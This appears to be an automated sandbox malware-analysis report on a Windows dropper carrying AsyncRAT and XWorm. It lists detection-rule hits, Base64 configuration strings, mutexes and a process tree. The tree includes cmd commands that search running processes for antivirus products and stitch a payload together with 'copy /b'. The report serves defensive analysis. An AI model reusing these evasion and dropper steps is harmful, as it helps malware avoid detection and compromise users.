Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys

Source: SQ1NgqeTQy.exe	Static PE information: Section: ZLIB complexity 0.9986542492378049
Source: SQ1NgqeTQy.exe	Static PE information: Section: payugmud ZLIB complexity 0.9947789401343922
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: Section: dxkyhxuw ZLIB complexity 0.9950042715491485
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: Section: ZLIB complexity 0.998030909400545
Source: skotes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.998030909400545
Source: random[1].exe.8.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: ca3f738a4c.exe.8.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe0.8.dr	Static PE information: Section: ZLIB complexity 1.0003080638801263
Source: random[1].exe0.8.dr	Static PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
Source: f35b37b5a5.exe.8.dr	Static PE information: Section: ZLIB complexity 1.0003080638801263
Source: f35b37b5a5.exe.8.dr	Static PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
Source: random[1].exe2.8.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 94cd0458cc.exe.8.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: SQ1NgqeTQy.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Settings.cs	Base64 encoded string: '/i32gtMLqGCTGRoLTU9pFCcSzU7e2Cj68LKBdNWQIT178er/KL1bXecVup1u73XU', 'LEahl8USOPil8YXnMkEp4KLJkNiStXZX7s6/7LbhaFROa8U6PfWnCHXA+ngClX7g'
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Settings.cs	Base64 encoded string: '/i32gtMLqGCTGRoLTU9pFCcSzU7e2Cj68LKBdNWQIT178er/KL1bXecVup1u73XU', 'LEahl8USOPil8YXnMkEp4KLJkNiStXZX7s6/7LbhaFROa8U6PfWnCHXA+ngClX7g'
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Settings.cs	Base64 encoded string: '/i32gtMLqGCTGRoLTU9pFCcSzU7e2Cj68LKBdNWQIT178er/KL1bXecVup1u73XU', 'LEahl8USOPil8YXnMkEp4KLJkNiStXZX7s6/7LbhaFROa8U6PfWnCHXA+ngClX7g'
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, Settings.cs	Base64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, Settings.cs	Base64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='

Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@116/143@76/15

Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ERUYSAYP.htm

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\yBu0GW2G5zAc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\AverageHorse
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3780:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\f35pmRFzPiiasEf1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

File created: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: SQ1NgqeTQy.exe, 00000000.00000003.2066223193.00000000056B9000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2066714341.000000000569D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SQ1NgqeTQy.exe	Virustotal: Detection: 62%
Source: SQ1NgqeTQy.exe	ReversingLabs: Detection: 57%

Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 78K21CNZITPIMAK88B8Q.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

File read: C:\Users\user\Desktop\SQ1NgqeTQy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SQ1NgqeTQy.exe "C:\Users\user\Desktop\SQ1NgqeTQy.exe"
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process created: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe "C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe"
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process created: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe "C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe"
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe "C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe"
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe "C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe"
